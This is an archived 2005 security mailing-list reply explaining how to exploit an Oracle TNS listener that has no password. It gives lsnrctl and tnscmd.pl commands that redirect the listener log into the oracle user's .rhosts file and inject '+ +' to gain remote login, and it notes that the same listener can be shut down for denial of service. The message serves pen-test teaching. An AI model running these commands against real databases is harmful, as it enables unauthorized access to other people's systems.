From: Joshua Wright (jwright@hasborg.com)
Date: Tue Aug 02 2005 - 21:49:55 EDT
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Joe,
Joe T wrote:
> When performing some network scans, I notice that the Oracle database
> rarely has a password set for the tnslsnr account.
> My question becomes: Has anyone exploited this misconfiguration, and
> if so - how? Is this an account that you can connect to without
> expensive Oracle software?
If the listener is not password protected, it's possible to change the
configuration of the listener or simply shut it down to cause a DoS. To
do something more devious, we can use the listener logging feature:
(on the attacker's machine with a local copy of lsnrctl):
eve$ lsnrctl
LSNRCTL> set current_listener target_ip_or_host
LSNRCTL> set log_file /home/oracle/.rhosts
LSNRCTL> exit
This will configure the listener to write logging information to the
specified file. Next, we can use the tnscmd.pl tool to send a raw
string to the victim TNS listener:
eve$ tnscmd.pl -h target_ip_or_host --rawcmd "(CONNECT_DATA=((
+ +
"
eve$
This will connect to the listener and send the string
"(CONNECT_DATA=((<CR>+ +<CR>". This information gets written to the
listener log file, which would produce a single line with "+ +".
If the target isn't running r-services, you can use other techniques to
obtain access to the remote OS. Perhaps ~oracle/.ssh/authorized_key2?
Note that you can download a trial version of the Oracle database from
otn.oracle.com, which would allow you to grab a copy of the lsnrctl tool.
This sample hack and several other Oracle auditing, assessment and
pen-test techniques are covered in the SANS Securing Oracle course.
SANS is offering the Securing Oracle course at our yearly Network
Security conference in New Orleans on 10/24-10/30. More information on
the Securing Oracle course and the topics covered is available at
http://www.sans.org/ns2005/description.php?tid=247.
NB: I work for the SANS Institute, and teach the Securing Oracle class
(although I'll be teaching Assessing and Securing Wireless at the
Network Security conference).
- -Josh
- --
- -Joshua Wright
jwright@hasborg.com
2005-2006 pgpkey: http://802.11ninja.net/pgpkey.htm
fingerprint: F00E 7A42 8375 0C55 964F E5A4 4D2F 22F6 3658 A4BF
Today I stumbled across the world's largest hotspot. The SSID is "linksys".
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org
iD8DBQFC8CLCTS8i9jZYpL8RAhDjAJ9oiXjl2HJaOjrGGC4GfBl6ZZKLiQCdFP3J
JM9FKGY6qCIk304rh4+LxLI=
=C64z
-----END PGP SIGNATURE-----
------------------------------------------------------------------------------
FREE WHITE PAPER - Wireless LAN Security: What Hackers Know That You Don't
Learn the hacker's secrets that compromise wireless LANs. Secure your
WLAN by understanding these threats, available hacking tools and proven
countermeasures. Defend your WLAN against man-in-the-Middle attacks and
session hijacking, denial-of-service, rogue access points, identity
thefts and MAC spoofing. Request your complimentary white paper at:
http://www.securityfocus.com/sponsor/AirDefense_pen-test_050801
-------------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:40 EDT